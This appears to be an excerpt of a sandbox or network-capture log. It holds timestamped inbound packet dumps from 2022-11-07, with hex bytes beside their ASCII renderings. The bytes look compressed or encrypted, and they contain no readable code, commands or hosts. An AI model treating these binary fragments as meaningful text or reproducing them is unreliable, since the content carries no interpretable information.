2022-11-07 22:49:09 UTC	9321	IN	Data Raw: 48 b3 0a e7 16 62 c6 5b 42 c9 c8 dd 83 76 b2 4b 14 57 30 82 2b 2a 06 b7 07 70 ad ef 05 7c 95 43 9f 05 f0 e1 7f ca 90 41 02 91 3e 98 3c 8a bc d2 22 98 d1 13 89 de 1a 02 fb 6e 4a 84 d2 95 57 90 0a 04 3a 08 53 01 32 c3 60 8c 9e 58 4f 0d 00 40 ba ed f4 d0 12 42 9f c7 39 06 02 2d e3 13 43 84 76 80 9b 3f cb 8f 72 b2 d3 0a 05 d3 6b 22 09 7d c1 c1 e2 52 fe 75 b3 64 a5 66 19 2c ca ab 42 1b 5c 84 f3 b2 e8 d6 7c f7 ad 05 21 df d6 be 81 df f6 ca 0e 61 e3 2d e8 a9 cc 07 02 bd 10 48 c9 be 94 f8 94 9d 26 23 14 24 65 09 1f ef 00 e0 4a ea 42 09 ac e3 75 0f eb a2 82 61 da f7 b4 40 24 e6 f8 41 ef 8d 25 56 f9 f1 f1 c9 c9 ce d4 04 82 e0 3d 64 96 23 10 08 aa 17 3e e8 92 0a 42 5e 17 0e 40 b2 4e f9 41 07 ef 61 3e cf ab 08 d9 5b 74 58 36 d7 b2 57 d9 27 4b 68 a4 ba 58 90 f8 7e 32 Data Ascii: Hb[BvKW0+*p\|CA><"nJW:S2`XO@B9-Cv?rk"}Rudf,B\\|!a-H&#$eJBua@$A%V=d#>B^@NAa>[tX6W'KhX~2
2022-11-07 22:49:09 UTC	9337	IN	Data Raw: 4e 19 8d 4b c2 cc 7e 9d 4f 14 42 c0 2d 18 83 9b 08 07 2d 84 10 1b 01 8f 0c b3 11 0c 33 fd c4 5c e0 f9 ee 9c ff 7b 19 2e 6a 76 32 2a 28 6c dd a7 56 0f 0a 6e 9f 2b 9e 82 a6 b3 b1 7b 15 c8 8a 3e 66 24 03 23 a8 8c d6 85 d6 ee f1 e8 75 be a8 f7 32 12 48 a0 a3 f1 eb e9 0f fb 98 dc cf ca a8 e0 7d 21 3f a2 26 70 6e af 08 96 84 8b 43 22 3a f4 a4 55 70 c4 1e 38 41 1d 1a 07 90 74 8f 10 f2 af 8c 9a 34 6b 51 6b 97 06 04 47 04 0d 0d 30 99 b5 41 d2 4f 22 19 3d 35 7f 7e 9e af 67 c6 ec 61 ef c1 43 3b df 9d bf 5b ec 47 c7 7e 42 b2 ef 75 d1 19 bb e6 a1 79 b7 84 f3 f1 8f cf ef a5 e3 aa 0f 90 d2 64 8c 87 82 d0 13 d0 0b 00 04 21 75 c6 7f 5d 02 d0 89 03 c1 23 1b d7 b7 7d fa 4f 46 4f 86 de 3f 20 8b e2 d2 32 ba 59 1e ac 36 e3 90 31 24 11 90 9c 1d b3 84 3b 7b 12 04 6b b2 0f b8 47 Data Ascii: NK~OB--3\{.jv2*(lVn+{>f$#u2H}!?&pnC":Up8At4kQkG0AO"=5~gaC;[G~Buyd!u]#}OFO? 2Y61$;{kG
2022-11-07 22:49:09 UTC	9353	IN	Data Raw: 21 73 42 ba 20 80 41 d2 5a 7e 74 d5 27 e7 44 6a 49 a6 58 31 1b 76 1c ec 74 54 72 bc 07 43 6b 47 da 44 21 d5 d6 8d a8 f4 12 48 29 38 ea 97 10 34 1a 1b b4 c7 45 01 0f d8 ae da 19 3e fa 85 39 3b 8c 31 b6 61 fe 6f da a8 94 c0 72 52 df 50 8f b9 67 1f e2 6c 42 d5 5f c6 f3 b5 d4 e2 fd f9 5b 54 30 5b 8a 4e 46 fa 4d a9 a5 f8 d3 71 b5 fb 06 7a 4b 03 ff 9d a2 8a 26 bd d5 68 c1 5e bc 9a 9f 51 48 eb 63 38 54 d9 7a f5 73 b8 59 78 ab 4b 83 9b 99 33 61 03 81 e3 b1 8f 56 84 41 b9 41 ef 2c 8f ed 6f af 4c 27 cd 06 75 55 ea 41 b9 e0 cf 51 2c 59 b9 d4 2d 7f 2d 1a 64 3d 68 02 c2 f6 f4 a8 d5 7a 3f 43 fb 93 a5 4a 1f 87 46 d4 3f ea e4 7e 0d 0b fa f9 f9 ca 9d 91 eb 0d 4a fd 9d 0f 4d bb fa 1b 4e a9 27 75 a5 a4 65 94 ef c0 74 94 72 28 1c 6a 7a 8b 42 f5 14 7b a3 bf ac 17 9a a9 dc 87 Data Ascii: !sB AZ~t'DjIX1vtTrCkGD!H)84E>9;1aorRPglB_[T0[NFMqzK&h^QHc8TzsYxK3aVAA,oL'uUAQ,Y--d=hz?CJF?~JMN'uetr(jzB{
2022-11-07 22:49:09 UTC	9369	IN	Data Raw: 5b 62 4c 6c 33 9b f6 56 10 c9 eb 70 bc d7 e5 e9 a3 b3 b5 30 6d e8 cc ae f0 57 ca af 56 86 95 4f f8 a2 6d 41 d3 98 5a eb 66 32 57 7c 6b e2 af de a2 01 ff 53 8c 17 13 d6 52 86 68 0a 07 eb c5 42 b2 e7 d4 ca 05 3a 47 6a 88 1b 1b 08 df af c2 64 a8 b8 be a0 1c d2 82 3b da 79 9b 22 2a 2f cf c4 c4 da 5e e4 7c b5 ae bd f2 cc a9 60 9b 24 29 86 3c 82 fb 33 a3 19 b3 ec 83 fe fd 97 49 e0 88 9d ee b3 6a c0 4d a4 aa 28 99 95 38 c1 6e 42 9a 96 12 be fd af 6f 43 6b 80 be bc 8f d6 1b 9e 27 06 8e d4 4e d4 d1 36 b6 ff fe 98 62 d1 dd 97 af fb 06 d2 4e 97 87 3e d5 47 11 a1 85 5b 4a 87 8b c9 20 d7 1e 01 fa 9d 19 df df 5c dc 67 42 9f 04 58 6a eb 1d f8 9e 81 2a af 7e 53 af 99 3f ea be a3 d9 51 7a fc e2 4c e0 82 c0 38 a0 de 9c 54 1d f2 3a 61 3e be 72 06 b9 bc 31 ed cc 8b df 7b b8 Data Ascii: [bLl3Vp0mWVOmAZf2W\|kSRhB:Gjd;y"/^\|`$)<3IjM(8nBoCk'N6bN>G[J \gBXj~S?QzL8T:a>r1{
2022-11-07 22:49:09 UTC	9385	IN	Data Raw: a9 c0 46 8e d7 00 4a 57 5b e7 08 31 9e 93 02 1c 86 df 59 d2 dd 01 1b cf 72 a6 a4 48 df a8 53 81 89 9e 4d 54 e6 3d 62 65 ce f8 32 e1 34 52 70 c7 51 1b 6b ef 42 c0 25 45 15 24 f2 09 cc 7f 41 a9 17 72 9c 32 5b 7b 45 90 03 ee d9 fc 5c 74 23 ff 01 dc 76 2d 03 b7 d9 10 3e 9d fd f1 20 c7 53 22 f9 26 7f 40 4f fc 0e 63 92 97 7b bd 35 0f e0 ca 5d 41 af 1e 03 25 af f1 ad 0e 14 cb e2 fd cd 15 45 0f bf c1 e7 2b dd b0 b8 74 15 7e 5d 14 d0 39 98 cd 60 0c 5f 9b 7d 45 fb b2 d3 91 f3 dd 46 ec 52 e7 8f 4a 37 40 26 30 da 4d ee e3 ac 22 e1 c6 67 6d e4 7e 7c ec 51 f6 9d 4a 6e 05 33 fc ca c6 30 1a fc 1e d5 0a fe a1 04 2c 3e 2d f7 4c 08 3d 13 be 46 b0 17 29 21 42 e6 7e dc 64 3d 0c 2a 4c 7b 30 1d 2f 4a e8 27 34 78 09 ad c9 0a 84 d4 fc b0 8c ee 4a fd 83 3b 49 82 bf b1 f1 6e 8c 80 Data Ascii: FJW[1YrHSMT=be24RpQkB%E$Ar2[{E\t#v-> S"&@Oc{5]A%E+t~]9`_}EFRJ7@&0M"gm~\|QJn30,>-L=F)!B~d=*L{0/J'4xJ;In
2022-11-07 22:49:09 UTC	9401	IN	Data Raw: 1d 2b ad d6 c8 bc 91 75 9b 9e d5 0c 29 c3 74 7b 04 c3 32 a2 07 a3 8e 62 ab b3 72 e2 61 da 1c 62 e9 07 17 22 43 68 09 10 1e de e5 34 2d f5 a6 11 6d 35 16 5e 41 9e 6d f1 9d de ea 77 d1 f7 43 e4 d9 1a c2 c7 7f cf 73 97 14 73 5c 6b 6b 9d d6 1f c0 64 13 5f a0 e4 e8 ab c7 f6 57 df 31 21 d1 4f 2f da eb 14 10 0b d6 f6 98 82 57 7e d5 4f 13 4a 37 ec 35 3f ad fc 42 b5 82 b8 ec 2a cd e2 78 50 99 02 4b 4a 9f c3 2b 12 08 33 a7 ec 37 a5 1e f9 79 4e f5 51 c3 59 01 5f 26 d5 5c 7a e2 17 ef f9 19 41 81 9c be f9 5b 4e 17 1e d2 a2 ba 3a 54 bb 83 ca 2c 8e b9 32 f2 f6 96 74 14 a5 aa 8b 6e 53 5b 27 1a ed bb c0 86 e9 3a 55 88 cd 48 b8 80 7d 12 32 e0 db 9a 7f 8c 9c 08 90 bf 58 7e f9 98 9b 71 1e 43 02 1a a4 4b 14 1b 48 3d 33 0d 64 8e 1a 76 84 78 ba 4d f6 75 a2 a1 89 65 8d 3e 5a 89 Data Ascii: +u)t{2brab"Ch4-m5^AmwCss\kkd_W1!O/W~OJ75?B*xPKJ+37yNQY_&\zA[N:T,2tnS[':UH}2X~qCKH=3dvxMue>Z
2022-11-07 22:49:09 UTC	9417	IN	Data Raw: b8 f7 2e 04 e1 d6 0e 97 49 72 1d fa 27 5c 1d 10 b9 33 32 0f ae 95 0e c1 b9 b1 ef f4 e1 d1 03 a5 2b 72 01 42 97 fb 42 25 e8 67 e7 78 d4 7d c0 33 30 9a 70 f8 a5 94 2d 97 1f 08 15 7d 93 f8 82 ad e2 95 11 55 30 e1 1f 44 b0 2f 0e 0d d2 44 88 1a 8c fa 0c 2f 05 54 c8 e0 5c 48 43 e5 6e 84 00 99 bf d6 e1 44 42 cf 70 15 00 38 6e 45 9a fc 8f ef 30 71 fe e3 d3 0c 58 53 9c d8 c3 67 1a 0e 77 0d ee 19 72 39 13 85 19 59 4e 4d b1 ce b6 8a a4 6d 8f bc 45 96 4d b6 a8 39 e3 60 68 5f f7 03 6b 93 81 ed 61 64 60 14 01 d9 b0 13 fd 31 60 cf b4 dc 3a bf ca 36 ff ab 9f b2 cf 3f 71 fd 85 de 72 7f e8 27 ed 3b 78 1f d1 2b da 64 cc 5b f8 cb 85 6e 32 7f fa 3b 00 99 cc b1 a7 a5 01 12 c0 c8 89 1c 0b 72 fa 78 7b 2f 2a 06 e3 3f 89 09 7f 0e 9e 74 ce f9 66 fc 82 72 20 66 0b 60 87 ca 23 4b c7 Data Ascii: .Ir'\32+rBB%gx}30p-}U0D/D/T\HCnDBp8nE0qXSgwr9YNMmEM9`h_kad`1`:6?qr';x+d[n2;rx{/*?tfr f`#K
2022-11-07 22:49:09 UTC	9433	IN	Data Raw: 48 96 09 a6 db a5 5e e6 1f d3 2a da e5 e1 76 c8 d2 c6 c3 f7 3d 8e dc 01 cd 03 10 44 80 8f 80 d2 3d db 8f 30 c6 bf b1 30 ed c4 8c 06 12 5c 00 04 dd f5 bf 00 6b 8c 89 2e 9c 79 41 59 dc 81 0c fa c4 d8 0b 6f c9 23 89 ba 50 3f 46 82 51 ba cb 8f 0d 0d 2b 1f 73 dc fe 99 cf ed e9 41 a0 73 03 f0 78 e1 8b 87 96 21 dd 8f 64 83 5a e5 3f 48 61 30 5c cf 4a 0b 76 d5 cf cd f2 d3 88 43 4a 59 19 d1 20 bb 60 e0 72 78 d8 c9 65 9d 97 e0 b3 1f e3 14 54 17 d8 ac 61 03 16 65 0e c1 7f dd 7b 85 a3 d2 c4 e0 3e f6 60 84 8f 1c fc c7 5a 9d 41 80 37 ea e7 fd 47 e6 67 65 d1 fd d8 fb b9 ab 99 83 f0 9a 72 fa a5 75 01 0c f1 6e 5c 50 01 97 91 2a ef 37 6b 28 54 2d 05 1d 20 f5 18 c0 53 4c 8b 3d 9f 84 2c 0a 97 77 40 02 f8 86 48 b2 ba ea f7 41 83 51 af 42 2d 77 31 27 1f 1a fa 90 1a a6 78 e9 93 Data Ascii: H^v=D=00\k.yAYo#P?FQ+sAsx!dZ?Ha0\JvCJY `rxeTae{>`ZA7Ggerun\P7k(T- SL=,w@HAQB-w1'x
2022-11-07 22:49:09 UTC	9449	IN	Data Raw: 8f 0a 7b d8 77 81 c5 68 00 00 00 97 64 45 3b c0 60 41 81 4d c4 9a ba 6c de f8 e9 c5 10 00 00 c0 44 27 0a c3 aa f7 c2 4b 26 55 18 2c 7b 7e 9a 6c fc 72 6d 68 f1 ac f5 00 f4 23 cc 30 e7 c4 10 e0 c6 05 15 3c f9 7e 02 bc 18 f5 81 e2 32 c5 a1 77 db f7 d9 ac 7d 07 f0 0c 57 f7 c6 8e 78 33 d9 2a c1 e9 3b f2 b9 ff f0 61 1d 99 66 7a 8b 7f 1d 75 3a d5 66 7a 39 37 98 da 15 e9 f5 81 c7 ff 74 6c 23 00 0f 0a 2e 74 f7 fb b2 da ff eb 7e 3d f4 78 04 f8 99 0e ce 80 72 7d 8b ff ff b9 3c cc 3c 6b b1 e9 9e 13 c7 ff 98 ef 3b 07 c7 3a 27 f5 f9 a2 9f a0 2b 8b 46 33 c3 bc 56 fd 99 cc e4 a9 0b 4e 5c 4e e5 c4 cb f9 f7 3b 77 2e 37 ad a5 48 ef 8b 67 6e c7 75 30 f8 c1 26 8e 72 76 5a 55 ca 0b 81 ba 3c cc d9 f9 66 85 14 fe 06 16 5b 04 33 00 6a c5 b4 0a d6 fa 81 eb bb 00 48 60 a2 3f 54 41 Data Ascii: {whdE;`AMlD'K&U,{~lrmh#0<~2w}Wx3*;afzu:fz97tl#.t~=xr}<<k;:'+F3VN\N;w.7Hgnu0&rvZU<f[3jH`?TA
2022-11-07 22:49:09 UTC	9465	IN	Data Raw: db 3e 16 57 b4 fa ff 3c 9b 08 3b 5c 17 f7 d8 d0 18 81 fb 54 a5 08 2f 84 57 fc 17 12 55 31 c3 ae d9 3c bd e7 f0 03 66 98 8e a0 5a 84 19 7e 15 15 e7 f8 fc ec ea 02 66 30 5d 79 ba 44 fa 03 f2 95 00 17 f9 dd d7 da e9 51 a1 3b 00 40 dc 2d 15 da 92 ba 0f b8 ec 33 8b b0 77 7e 38 10 32 00 00 b8 06 f2 fe 23 ec 36 16 89 da 3a 00 fb e2 31 f7 c1 46 3d 09 df 7f c0 08 3e 56 82 84 7f d9 cc 27 2f 68 60 e5 b4 8e 07 16 60 55 fe ff f7 70 7a 27 1a 3c b5 e6 9e 2b e9 22 ee d2 ff 48 69 b8 f9 66 23 19 84 e9 35 13 7d cb 75 df e5 03 bc 37 c3 8b 80 fa ff 3f 20 e9 7e 16 fa 1e e7 1d 86 06 fd 7f 6d 0c 99 f0 6d 5e b8 76 ee e8 ff f0 cd 81 66 0f 48 20 85 74 5b f9 81 c7 3a 00 00 00 ea 32 0a c4 a9 f7 d9 81 be 93 24 94 6b f7 d9 e9 e7 c7 c6 ff e7 b6 20 7e 1e 76 c0 86 66 f7 f1 37 d2 5a e8 16 Data Ascii: >W<;\T/WU1<fZ~f0]yDQ;@-3w~82#6:1F=>V'/h``Upz'<+"Hif#5}u7? ~mm^vfH t[:2$k ~vf7Z
2022-11-07 22:49:09 UTC	9481	IN	Data Raw: 2e b1 28 81 f4 0d 94 11 1b 86 5c 80 a1 1d 5e 0d 75 39 9d 11 6e cc fb b8 de db 10 60 07 53 b8 26 5c dd 2e 85 42 88 e3 55 63 9a 28 76 a6 84 c1 5e 8e af d3 1f 18 ab 65 b0 81 cc 82 d2 c6 a8 ec 15 94 9e 81 8d ae e5 84 b4 57 de 4f dc 31 95 9d 15 78 43 2c d1 38 fa 4d e1 bf c9 9a e6 bf 68 47 6e 97 13 b9 b3 73 b5 06 9f 71 68 9e 82 a6 93 26 91 89 a5 fb 57 09 31 68 83 32 ba f1 83 c8 10 25 5b d7 2a 0c 00 99 93 12 64 17 86 15 32 98 75 3a 5a 17 8d e2 1b 3e 65 72 69 0a 6a 51 63 d2 d1 d0 34 8f 9a a6 db ed c1 86 fb 17 d7 3f 8f 93 d1 1e 79 b8 4c 34 b1 77 1e 64 96 7b ad 72 ce 1d fa 19 74 ee 2c 9c 0c df 12 72 f0 d1 ac c0 41 18 ac 25 57 d9 dc 9a 6d 16 87 1a 9a 9e e8 7c 70 7c 8e 92 ee 98 5b 27 d0 0b 28 b1 06 68 cb 4a d7 dd 3a 45 be f3 41 72 87 2a 38 c8 3f ed f2 e2 75 f5 97 d1 Data Ascii: .(\^u9n`S&\.BUc(v^eWO1xC,8MhGnsqh&W1h2%[d2u:Z>erijQc4?yL4wd{rt,rA%Wm\|p\|['(hJ:EAr8?u
2022-11-07 22:49:09 UTC	9497	IN	Data Raw: 89 81 5f 81 13 63 ba da 6e 2d b2 46 02 dc ab 7e 4b a5 83 39 c7 9f df 64 c7 b8 0a 74 f0 65 66 b7 35 47 a3 9f 5e 50 0c 95 9e 73 2e 18 d7 be 59 37 73 a4 9a 3f 91 44 85 95 1c 94 90 b6 7c 15 9a 58 9d dd 85 05 43 a2 c0 89 17 40 f0 43 3d fe fe a1 6d 1b ca 18 82 ca 7b 0e b2 24 74 11 89 97 09 ea 8a eb 15 98 00 6b d4 9e 82 2d b1 19 8b ba 93 7d 7c 0c af df c1 04 9a e8 ac 1b ba 53 40 b0 e8 43 5f ca 40 af b4 a9 59 77 87 85 40 cd 26 80 8e b2 78 9e 92 e9 cf bc 4f e9 43 00 9b 8f d6 35 1e 56 c0 b7 26 27 0d b2 d6 a6 a2 72 68 f4 0b 93 6a 49 1a 60 a4 39 34 7f 45 af f1 d7 37 0a e1 ce 91 05 62 84 2b 67 5e 61 b3 38 d3 58 07 8b 59 89 9e 17 20 45 fd 2e ea 63 81 25 17 0d 72 34 c6 ef 63 8b ca c1 1d 74 14 0a dd da a0 23 0e 63 f1 c9 9e 73 4a 33 7a 0e 55 65 64 ea ac 8f 0e 59 c7 fb 31 Data Ascii: _cn-F~K9dtef5G^Ps.Y7s?D\|XC@C=m{$tk-}\|S@C_@Yw@&xOC5V&'rhjI`94E7b+g^a8XY E.c%r4ct#csJ3zUedY1
2022-11-07 22:49:09 UTC	9513	IN	Data Raw: 73 e2 e6 26 30 35 96 e0 30 84 2e d6 d5 a2 19 c6 15 24 42 bc 70 3d ab e5 48 70 e7 01 7b 9f 06 d3 c5 e0 0b 7e b4 e4 41 b6 2e af 65 9f 1d 24 c3 e3 7a 0c 23 df 9b 68 3b eb 1d ee bf 28 c6 e4 42 0a 14 f0 8b 61 5b d8 f3 50 43 10 a6 cb 90 da 63 c8 53 7a 3e ea 63 13 9f 5a 9f a1 4d 5f c6 59 61 19 46 ca d7 91 c2 75 ed 2c 32 2d 74 1b da 1a bf 6b 20 46 43 6d cb e9 3d ee d9 81 8e c1 10 50 7a 97 3b fc 76 4c 0f da 34 fe 3c f7 fe d7 07 3a 0b 32 8e e1 ba 83 68 e3 30 ce 0d 3a 42 2d 30 f8 cc 05 2b 4c 5a 17 ab a6 58 38 66 b3 7c a7 de 77 d0 47 93 ba b2 1b 71 a9 9f b2 a0 c2 7f 10 01 d2 8e 0a 22 58 78 67 6b 39 e5 3c e5 cf 0d c0 de 02 9c 5b bd ca 89 94 2e b2 5a 42 b5 8f a7 07 2d 7e 6c d2 9d a6 5f 52 98 2f 8f 15 69 47 b2 9f 7f 28 6a 1a 57 66 ed 53 a9 1f 35 34 1f 45 97 9d aa f1 53 Data Ascii: s&050.$Bp=Hp{~A.e$z#h;(Ba[PCcSz>cZM_YaFu,2-tk FCm=Pz;vL4<:2h0:B-0+LZX8f\|wGq"Xxgk9<[.ZB-~l_R/iG(jWfS54ES
2022-11-07 22:49:09 UTC	9529	IN	Data Raw: b6 97 fe c1 a9 72 e4 e0 bc 16 67 39 f9 3b 94 b0 50 61 bf 37 14 39 53 5d 4f 05 2a 4b 66 31 1b 7e 79 8a 8d b5 32 5a 61 fe e4 d7 5b 04 63 6f dd 28 24 71 4a 8e e5 fb 5f d0 53 e5 6a b2 ca 54 bd 25 fd 26 c6 f7 ce 4a 48 0c f0 d8 b3 96 df 32 81 e6 6d f4 80 4d 22 b7 05 61 e0 8a 23 66 88 b2 e0 51 cf a3 3b 83 f4 6a 09 b0 9b a6 0c 6c fb ec 22 5d ff a2 97 6d f2 13 18 29 35 7f 39 40 41 c6 d3 76 c8 71 d0 34 c8 e3 17 85 2f 4d db 73 78 91 02 fe 94 c4 6d 69 85 32 22 1b 17 0c a4 82 64 e2 2b 72 3c a5 27 ac 46 71 a8 14 be 31 97 5a 1e c3 5d 6c e3 bb 58 86 3e 69 79 49 8f ff 8f a8 b5 a3 63 14 c0 6d 2c 0a e9 57 dc 64 a2 8c 40 62 dd ac 10 34 f9 dd 25 5a 43 a3 a7 f2 5e 8d 29 e0 41 64 a3 0f fe 24 3d fc 48 5b 34 b2 80 f0 fa a3 3e 3b 51 2a 25 f5 25 75 7e 1c 84 75 34 1c 81 4c bd 03 4f Data Ascii: rg9;Pa79S]OKf1~y2Za[co($qJ_SjT%&JH2mM"a#fQ;jl"]m)59@Avq4/Msxmi2"d+r<'Fq1Z]lX>iyIcm,Wd@b4%ZC^)Ad$=H[4>;Q%%u~u4LO
2022-11-07 22:49:09 UTC	9545	IN	Data Raw: 46 78 b9 30 f3 f2 a9 f5 8b b9 12 b8 81 d2 c0 65 52 15 29 5c 77 53 99 94 08 cb 74 94 dc bc 3e e9 2f ed 14 87 fa ae 38 aa 64 0f b5 59 36 33 4a 17 d7 13 84 1e db 7f 6e 2d 3a bf 96 a9 9d 8f 61 22 11 a9 03 1e af 29 a5 dd 5b bd 45 c8 25 bc 26 da e2 91 10 e9 e7 6f 06 49 b0 db d4 88 5a e4 e3 9a 22 4c e9 a5 fa 18 26 e2 da bb 2d 9a b2 2e 5b 27 36 38 a9 f8 2d 3b 5a 22 cd 3e 29 70 80 f4 f1 5b ef 8e 87 95 e6 b4 07 93 ea d3 2c 78 4a ea 63 c3 17 31 8b 61 c8 e5 db fd 8c 2d a9 d9 e8 4b 2b 63 65 6e e7 84 d8 ad 32 9f 12 56 8e 5f 17 f4 13 93 c7 9f a1 b9 1a 43 8b 03 da 88 3e 8d bb 38 68 e5 48 f2 16 f2 a2 9f 02 aa c7 14 6c b3 cc 77 33 8a d0 25 70 d8 f8 e6 a2 7c 68 4a 68 50 dd ef 59 65 49 68 22 4b cc 8d e1 1e fe 7c 5d d7 e3 42 fc 88 dc 2f 78 f6 02 1c 2b 84 3d d1 a3 ab 27 ef 04 Data Ascii: Fx0eR)\wSt>/8dY63Jn-:a")[E%&oIZ"L&-.['68-;Z">)p[,xJc1a-K+cen2V_C>8hHlw3%p\|hJhPYeIh"K\|]B/x+='
2022-11-07 22:49:09 UTC	9561	IN	Data Raw: 51 ad ec 35 8a e3 1b 18 37 a8 aa 7a fe 2a 89 f1 6a 21 b0 53 20 c3 d8 47 49 c9 a8 4a fb fb 89 d1 8f 88 9e 80 63 73 6e 2e 44 84 b1 2e b9 14 f2 9d 34 08 dc 41 bb fa c1 bb 85 30 a0 34 f3 75 f2 34 8a 07 33 32 18 b9 99 71 a1 21 1d 20 f3 27 9f 47 95 94 ca 3b 82 bb fc 6b 79 2c 39 70 f7 a0 a3 b1 ad 86 37 39 7b 6d 94 7b 0b 5a aa 93 6b 1f 10 b9 a6 9e 5b 70 3e 69 e1 08 37 3f e2 41 c8 2a d0 bf dd e2 1c 6a ee ff b1 e2 c0 90 21 d3 e6 c9 98 9e db 49 9b 70 74 2a be 5e e2 2a 8f 5d d4 dc 0c 81 99 a2 50 03 e0 a4 7c a2 1a 86 08 ce 8b de 5c 16 c5 50 0c 80 93 cb 80 17 86 ad 08 72 ee aa 40 3e d6 8d 25 6d e6 83 59 62 a0 51 09 35 e9 68 52 26 4a c8 fe de ea fa 79 ec fc fa bd 4e 91 ad 68 98 d8 69 a8 97 32 c6 fb ec 27 cb 9a 2b ec 75 2e 9c f5 42 38 c5 67 d6 8d 92 ae 9c 0f 13 01 f1 09 Data Ascii: Q57zj!S GIJcsn.D.4A04u432q! 'G;ky,9p79{m{Zk[p>i7?Aj!Ipt^]P\|\Pr@>%mYbQ5hR&JyNhi2'+u.B8g
2022-11-07 22:49:09 UTC	9577	IN	Data Raw: e5 41 c9 45 11 74 91 1f 73 d1 24 f7 bb f8 5e a4 c4 96 f9 d7 95 55 10 81 83 77 2c 4b d3 f4 2d 58 fc 7c c7 6a 83 15 dc 91 89 f1 7c e8 1e c2 8f 36 6f d3 56 0c 98 19 53 77 74 a5 0c 84 4d ce 52 c0 9f db 94 69 55 bc 74 01 c4 b4 f6 68 60 67 19 81 f7 f1 45 a3 15 ae 0f 57 90 c4 39 9b 24 79 c6 40 97 64 75 f0 05 ce 5c 4c 9d 9a 7f dd 7d 31 b2 32 f9 87 3f 29 2f da 28 af b4 49 23 c4 03 71 fd 71 bb 54 69 7d 59 80 dc 6a 67 4d ae 7c 8f 82 23 7e 30 6c 23 a8 6b c8 26 ba 9c db 89 61 24 5f df 62 73 15 67 d2 ee a9 89 0e cc 01 ba ee 2d 1d 06 1a 6d dc ce b6 b9 b9 77 4e 21 86 5f 2d 78 3c 7e ff fa f0 1f 17 ad 57 67 1f 26 ef 71 58 9f 10 49 21 37 76 43 46 cf b6 2a c9 1f 5f 0d bc 4f 2a 21 08 7a 1f e7 e2 ed 27 55 eb 34 e1 61 80 4c 1f fe b4 06 e6 b6 92 db 70 af 1f cd 00 d1 63 f1 9e f0 Data Ascii: AEts$^Uw,K-X\|j\|6oVSwtMRiUth`gEW9$y@du\L}12?)/(I#qqTi}YjgM\|#~0l#k&a$_bsg-mwN!_-x<~Wg&qXI!7vCF_O!z'U4aLpc
2022-11-07 22:49:09 UTC	9593	IN	Data Raw: 40 88 7a 35 b8 1d 5f be 58 9c 85 0c e6 5a ee d6 48 e9 76 bc c3 1f dd 01 c1 87 92 6b c2 93 65 53 82 a3 9b 77 65 f8 b2 8a df 5a c3 e1 68 30 95 2a e6 18 90 64 55 fa a6 5d 36 8f 66 ad ef f2 11 44 80 35 97 d6 b8 12 1c 0e 1a f4 ec 95 29 11 ba 1f b4 af 50 19 1c b0 f1 6c ee 6b c6 23 a5 38 fd 03 b5 32 89 8d 83 b1 fb 4d 57 d4 2e 44 b5 48 4a fb a4 7b 0f 28 46 ca 2c 77 fc 14 ff 5e 31 86 2b 82 08 a5 b7 4a 62 13 bc ba c4 8b 4b cd 69 ff c9 09 f8 7a 0c 13 c1 a1 b3 0c 38 b7 cd 88 b4 fb 0b 40 df b9 16 ff 54 f8 a8 80 45 81 4b d1 2b 75 2c 0b 0d 8b c6 c5 a3 75 1f 98 b3 29 6a f7 db e7 c5 ce 28 d2 b8 25 5c 1a 43 b8 40 6e 43 80 49 29 7b 33 d2 39 ee b9 58 84 be bf 0c 0a a3 dd 23 ba d3 13 12 34 db 24 70 b0 43 e9 78 6c f1 12 4e f0 8f 5d 77 b0 ed 71 8d ed 3f 61 5d c4 9c d4 e2 0d 5a Data Ascii: @z5_XZHvkeSweZh0*dU]6fD5)Plk#82MW.DHJ{(F,w^1+JbKiz8@TEK+u,u)j(%\C@nCI){39X#4$pCxlN]wq?a]Z
2022-11-07 22:49:09 UTC	9609	IN	Data Raw: 56 e6 c9 e1 41 73 11 13 12 3f 3c 1e 32 7a fd f2 98 26 8d e1 94 bf d9 60 dc f0 02 48 08 35 22 96 e2 c0 1c 22 32 b2 6d 36 a2 95 82 29 5c ee c3 ad a6 58 bd c3 0c fa ae 4b 69 e0 52 db e5 ac 20 2b 62 c6 9f 2e 12 bd 01 aa 82 78 a3 f4 19 02 b1 87 0d e6 dc 1d 3b e1 fc 60 ae 75 77 dd 9b 45 ce 85 c0 b3 e5 47 9e 86 8a 9e 7f d8 64 16 05 fe bd c5 83 7a 4f db 3d 17 29 25 e6 fe 4c c4 84 12 9c f2 89 65 04 99 4b c8 19 df 6c 79 e0 84 54 e1 af f9 6b ee 9f 58 10 78 a1 eb 09 f6 1c a9 96 ab 20 aa af 97 91 21 a2 7e f7 e7 c6 db 90 f9 4d ae bd 40 77 de da c4 c5 68 08 52 16 47 68 48 48 32 a4 57 da 72 69 32 73 07 bb 11 63 37 b2 e9 2d 85 e0 61 39 b7 53 cf a8 04 bd 90 46 84 45 5b 06 df d7 3e 9b e2 c9 92 b5 8b 3c db 99 33 0e 08 d3 13 27 c4 1c 43 ed 27 be b0 38 5b 83 e4 2f 36 12 83 cf Data Ascii: VAs?<2z&`H5""2m6)\XKiR +b.x;`uwEGdzO=)%LeKlyTkXx !~M@whRGhHH2Wri2sc7-a9SFE[><3'C'8[/6
2022-11-07 22:49:09 UTC	9625	IN	Data Raw: b4 88 98 9d 7c 6b c6 58 88 26 ca 1c df d8 69 36 30 cc 98 38 44 8d 46 2c c7 a9 86 ee 01 40 8c 96 72 53 3d dc 39 14 1e 7b bd aa 65 5f 4d 0e 51 a9 22 2c b4 35 d8 ac aa e1 8e ea 98 8f e2 dc 4f 1c c4 fc 8a 45 ec 24 b8 f6 96 1c 64 5f b7 0a 8d 1b af 5d 26 f0 42 20 b4 9b 47 8b b5 3b e4 7e 17 94 b3 6a 3a 5b 66 b7 cf d9 7a 36 7b cd 1f 12 ee bd 0a cd eb 8b 0d e9 34 8b ef 0f c0 a9 d7 49 95 f6 98 42 bc ec 97 52 43 37 15 a2 af 28 70 07 04 b3 9b 41 5f fc 41 15 af 6c 4b 14 c2 b9 21 69 6f 38 01 31 ea 3e 06 08 da 60 16 83 e0 ed 08 00 e9 e6 ef 44 77 15 34 06 f5 79 52 22 56 50 36 a7 04 a8 04 f4 85 1e bf 45 a9 cc bd 02 45 f0 c9 6e 57 84 81 64 a3 7a a3 7d 3f 65 cf e1 21 8b 2c 58 91 33 c9 3d 33 85 4b 16 b4 c4 2b 5a e3 39 a1 99 ca eb 6a 49 20 78 e5 df ee fe e8 d6 aa 10 f1 bb bf Data Ascii: \|kX&i608DF,@rS=9{e_MQ",5OE$d_]&B 